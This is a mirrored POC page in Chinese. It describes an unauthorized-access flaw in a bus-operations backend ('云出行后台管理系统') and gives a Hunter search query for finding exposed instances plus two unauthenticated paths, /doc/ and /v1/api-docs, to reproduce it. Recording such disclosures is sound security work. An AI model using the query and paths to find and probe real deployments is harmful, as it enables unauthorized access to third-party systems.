mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-08 03:46:17 +00:00
31 lines
1.1 KiB
Markdown
31 lines
1.1 KiB
Markdown
# 江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞
|
||
|
||
# 一、漏洞简介
|
||
江西云本数字科技有限公司总部设立于英雄城南昌,拥有原江西华兴信息产业科技有限公司的原班团队,拥有10年以上的研发、生产、销售智能化公交电子站牌的公交系统服务经验。江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞。
|
||
|
||
# 二、影响版本
|
||
+ 云出行后台管理系统
|
||
|
||
# 三、资产测绘
|
||
+ hunter`web.body="云出行后台管理系统"`
|
||
+ 特征
|
||
|
||

|
||
|
||
# 四、漏洞复现
|
||
```plain
|
||
/doc/
|
||
```
|
||
|
||

|
||
|
||
```plain
|
||
/v1/api-docs
|
||
```
|
||
|
||

|
||
|
||
|
||
|
||
> 更新: 2024-03-13 23:54:14
|
||
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pheadzhwmwz319mg> |